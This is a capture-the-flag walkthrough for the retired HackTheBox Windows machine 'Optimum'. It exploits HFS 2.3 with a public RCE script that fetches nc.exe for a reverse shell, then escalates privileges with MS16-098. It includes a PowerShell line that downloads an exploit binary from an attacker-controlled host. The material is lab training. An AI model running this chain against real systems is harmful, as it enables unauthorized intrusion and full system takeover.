Today We’re going to solve Optimum, This is a retired machine from HackTheBox.
Optimum is a windows machine. Without wasting anymore time let’s start with the walk through.
Step 1 :nmap scan.
Okay so there’s only 1 port open that is port 80. Let’s see whats running there on the port 80.
Okay now from the nmap service scan with -sV we can see that HFS version 2.3 is running on the machine. Let’s search for HFS Version 2.3 Exploit if there is any available on the internet.
Let’s get the first exploit available on the exploit-db. This is a RCE exploit.
After downloading edit the Local IP and Local port on the exploit.
and as mentioned we need to host nc.exe in any directory at port 80 for it to be downloaded onto the machine.
Now we are all set for the exploit to go live.
Now run the exploit you just downloaded, But before that we need to setup a netcat listener in a new tab on the port as mentioned on the exploit i.e., port 8080.
now run the exploit from the previous tab.
Cool we got a shell.
Now cd and get the user.txt, but now we need root flag as well for that we need to run windows exploit suggester and for that we need system info.
Cool we got system info.
Now download and run windows exploit suggestor from Github.
now for running we need to copy the system info into the file systeminfo.txt before running the windows exploit suggester.
okay now we are all set to run the script.
We will use the below command. take help from the github you will learn in any issues.
./windows-exploit-suggester.py — database 2014–06–06-mssb.xlsx — systeminfo systeminfo.txt
The file 2014–06–06 needs to be changed to whatever you got after the update as shown in nthe github page for running this script and systeminfo.txt file you need to make it in the same directory in which the script is placed.
Now let’s run the script.
for me the updated database is 2019–08–01-mssb.xls.
so my command will be :
./windows-exploit-suggester.py — database 2019–08–01-mssb.xls — systeminfo systeminfo.txt
From the above script’s result you come across a lot of exploit. You need to filter out for what you want.
Like the first exploit is a DOS attack, and we don’t need that.
so after trying exploit and filtering is come accross MS16–098 integer overflow exploit.
Cool we got the exploit download directly the binary file or you can compile it locally if the remote system has gcc compiler.
I am downloading the binary i.e., .exe.
Now from the downloaded folder run a python server at port 80 only. using python -m SimpleHTTPServer 80
and from the remote machine’s shell by using powershell download the exe exploit onto the remote system.
powershell wget http://ATTACKER IP/41020.exe -outfile privesc.exe
Ok let’s dir and check if the exploit is there or not.
Now, the time has come to run the exploit privesc.exe.
Boom, and we are now running as nt authority\system
Now cd to root.txt and claim your flag.